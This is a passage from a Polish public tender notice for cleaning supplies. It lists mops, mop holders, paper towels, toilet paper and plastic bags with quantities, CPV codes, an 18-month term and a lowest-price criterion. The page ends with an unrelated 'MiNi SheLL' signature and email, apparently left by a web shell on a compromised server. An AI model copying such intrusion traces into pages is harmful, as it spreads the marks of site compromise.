5.	Wiadra plastikowe o poj.10l, bez pokrywy, kolor czerwony i niebieski	szt.	36
6.	Szczotka do WC + pojemnik	kpl.	54
7.	Szczotka do mycia kaloryferów	szt.	9
8.	Szufelka + zmiotka plastikowa	kpl.	36
9.	Szczotka do mycia butelek (poj. butelki 250ml)	szt.	42
10.	Ściągaczka do wody ze stylem  40cm	szt.	6
11.	Ściągaczka do wody ze stylem  60cm	szt.	6
12.	Gąbka do mycia naczyń z jednostronną powierzchnią szorującą, nie powodującą zarysowań rozm. 9,5cmx7cmx4,5cm typu Vileda	szt.	1980
13.	Druciak metalowy o drobnym splocie z blachy nierdzewnej 60g. do czyszczenia kotłów 	szt.	120
14.	Druciak plastikowy śr. 8cm	szt.	120
15.	Ścierka do podłóg bawełniana biała rozm. 68x68 cm (+/- 2cm)	szt.	440
16.	Ściereczka flizelinowa rozm. 38x38cm żółta (+ /- 2cm)	szt.	1800
17.	Ściereczka flizelinowa rozm. 38x38cm niebieska (+ - 2cm)	szt.	1800
18.	Ściereczka flizelinowa rozm. 38x38cm czerwona (+ - 2cm)	szt.	1800
19.	Ściereczka flizelinowa rozm. 38x38cm zielona (+ - 2cm)	szt.	1500
20.	Ściereczka flizelinowa rozm. 38x38cm pomarańczowa (+ - 2cm)	szt.	480
21.	Ściereczka tetrowa 80cm x 80 cm	szt.	360
22.	Ściereczki ostre do mycia zlewów rozm. 10x15cm	szt.	96.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6 mopy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mop kieszeniowy - skład: bawełna 60% (+ -10%), poliester, odporność na temp.prania 60-95 st.C, wymiary dł.430mm (+ - 10mm), szer. 145mm (+ -10mm), waga mopa 140g-170g, wewnątrz mopa pętelki, na obrzeżach mopa frędzle, długość frędzli na obrzeżach mopa 35mm (+ - 10mm), ilość wewnętrznych tkanych rzędów pętelek: min. 15, wysokość pętelki: 20mm (+ - 5mm), rodzaj tkania wewnętrznych rzędów pętelek zapewniający brak możliwości wyciągnięcia nitki z tkaniny, oznaczenie mopa kolorową lamówką wszytą na całej długości mopa, ilość dostępnych kolorów lamówek: min. 5 (niebieski, czerwony, zielony, żółty, biały), 2 kieszenie do mocowania mopa na uchwycie z nacięciami odprowadzającymi wodę, kieszenie mopa posiadające wzmocnienie z rozciągliwego materiału zapewniającego zmniejszenie naprężeń i wyeliminowanie możliwości uszkodzeń mechanicznych, przeszyte w tym samym miejscu co lamówka, wymiary wewnętrzne kieszeni mopa: głębokość 65mm (+ -10mm), szerokość 120mm (+ - 10mm), oznakowany przepisem prania, do czyszczenia wszelkich powierzchni na wilgotno i mokro, gwarancja wytrzymałości min. 250 cykli prania	szt.
2.	Mop kieszeniowy - skład: bawełna 60% (+ -10%), poliester, odporność na temp. prania 60-95 st.C, wymiary dł.540mm (+ - 10mm), szer. 165mm (+ -10mm), waga mopa 190g (+ -10g), wewnatrz mopa pętelki, na obrzeżach mopa frędzle, długość frędzli na obrzeżach mopa 40mm (+ -10mm),  ilość wewnętrznych tkanych rzędów pętelek: min. 17, wysokość pętelki: 20mm (+ - 5mm), rodzaj tkania wewnętrznych rzędów pętelek zapewniający brak możliwości wyciągnięcia nitki z tkaniny, oznaczenie mopa kolorową lamówką wszytą na całej długości mopa, ilość dostępnych kolorów lamówek: min. 5 (niebieski, czerwony, zielony, żółty, biały), 2 kieszenie do mocowania mopa na uchwycie z nacięciami odprowadzającymi wodę, kieszenie mopa, posiadające wzmocnienie z rozciągliwego materiału zapewniającego zmniejszenie naprężeń i wyeliminowanie możliwości uszkodzeń mechanicznych, przeszyte w tym samym miejscu co lamówka, wymiary wewnętrzne kieszeni mopa: głębokość 60mm (+/ -10mm), szerokość 135mm (+ /- 5mm), oznakowany przepisem prania, do czyszczenia wszelkich powierzchni na wilgotno i mokro, gwarancja wytrzymałości min. 250 cykli prania	szt.
Do oferty należy dołączyć:
- próbkę nakładki mopa - do oceny zgodności przedmiotu zamówienia z opisem oraz jako wzornik podczas realizacji zamówień. 
- dokument potwierdzający ilość cykli prania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7  artykuły gospodarcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Skrobaczka kieszeniowa wykonana z metalu z plastikową rączką. Przeznaczona do gładkich powierzchni z możliwością wymiany ostrza, wymiary 12x4,5cm	szt.	4
2.	Uchwyt magnesowy (stopa) + drążek aluminiowy do uchwytu o długości 160cm zakończony z jednej strony rękojeścią, z a drugiej otworem do mocowania uchwytu, kompatybilny ze stopą. Uchwyt przystosowany tylko do nakładek z kieszeniami, posiadający automatyczny mechanizm zamykający dzięki zastosowaniu stałego magnesu, nisko mocowana oś obrotu poziomego zapobiegająca przekręcaniu się uchwytów w miejscach krańcowych, wyposażony w przegub, który pozwalający na łatwą pracę w każdym kierunku, spłaszczone końce uchwytu umożliwiające łatwe mocowanie nakładki, gdy kieszenie nie są rozchylone, wymiary: 39cm (+ -5cm) x 10cm (+ - 5cm), waga 515g (+ - 5g), zaokrąglone brzegi umożliwiające łatwe chwytanie nakładek na kieszenie, materiał typu Armitel, polietyroster TPE. 	szt.	40
3.	Ściągaczka do wody dwustronna szer. 60cm (bawełna+guma) ze stylem teleskopowym ok. 2m	szt.	5
Do oferty należy dołączyć:
- próbkę stopy i drążka - do oceny zgodności przedmiotu zamówienia z opisem oraz jako wzornik podczas realizacji zamówień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8 ręczniki papierowe i papier toaletowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ręcznik papierowy na rolce biały z perforacją, 2-warstwowy, szer. 23cm, dł. listka 20cm, ilość listków na rolce 45 szt.	szt.	1080
2.	Papier toaletowy o dł.min. 23m, szary,bez perforacji, waga min. 80g	szt.	2500
3.	Ręczniki składane, papierowe, tzw. listki o rozm. 0,25mx0,23m op/4000skł	op.	1170.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9 worki foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Worki foliowe 50x60 żółte HDPE op=50szt.	op.	22
2.	Worki foliowe 50x60 czerwone HDPE op=50szt.	op.	650
3.	Worki foliowe 50x60 czarne HDPE op=50szt.	op.	3300
4.	Worki foliowe 60x80 czerwone HDPE op=50szt	op.	900
5.	Worki foliowe 60x80 czarne HDPE op=50szt	op.	850
6.	Worki foliowe 60x90 czarne HDPE op=50szt	op.	1900
7.	Worki foliowe 70x110 czrne LDPE op=10 szt.	op.	7500
8.	Worki foliowe 70x110 czerwone LDPE op=10 szt.	op.	3400
9.	Worki foliowe 70x110 żółte LDPE op=10 szt.	op.	37
10.	Woreczki foliowe z atestem do żywności rozm. 25x35cm op=100szt.	op.	120
11.	Woreczki foliowe z atestem do żywności o poj. 120l  op=100szt.	op.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.64.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com